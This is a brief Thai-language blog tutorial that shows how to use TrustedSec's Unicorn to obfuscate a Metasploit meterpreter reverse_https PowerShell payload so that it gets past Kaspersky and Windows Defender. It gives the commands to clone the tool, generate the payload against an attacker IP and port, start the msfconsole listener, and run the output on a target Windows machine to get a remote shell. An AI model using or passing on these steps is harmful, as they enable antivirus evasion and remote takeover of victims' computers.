โดยปกติแล้วหากเราสร้าง payload ด้วย msfvenom ไปเป็น exe, powershell เองก็ตามจะติด Kaspersky, Windows Defender ทีนี้ทาง Trustsec ได้สร้าง script สำหรับการสร้าง obfuscate (การปรับเปลี่ยนหรือเจือปน payload ใดๆที่ทำให้รูปลักษณ์หรือการทำงานแตกต่างจากเดิมแต่ได้รับผลเช่นเดิม) payload ขึ้นมา เพื่อให้เราสามารถสร้าง payload ไปรันใน Windows 10 ได้ นั่นคือ Unicorn นั่นเอง
1. Download unicorn
|
1 |
git clone https://github.com/trustedsec/unicorn |
2. Generate obfuscate payload ด้วย Unicorn
|
1 |
./unicorn.py windows/meterpreter/reverse_https <IP> <PORT> |
3. รัน Metasploit พร้อมกับใช้ rc file โดยใช้คำสั่ง
|
1 |
msfconsole -r unicorn.rc |
4. ในขั้นตอนที่ 2 เราจะได้ไฟล์ที่ชื่อว่า powershell_attack.txt ภายในไฟล์จะเป็น powershell พร้อมกับ payload ของ Metasploit ให้เรานำคำสั่งดังกล่าวไปรันใน Windows เป้าหมาย ก็จะได้ shell ครับ
Source:: Wonder Howto
LINE@Techsuii.com
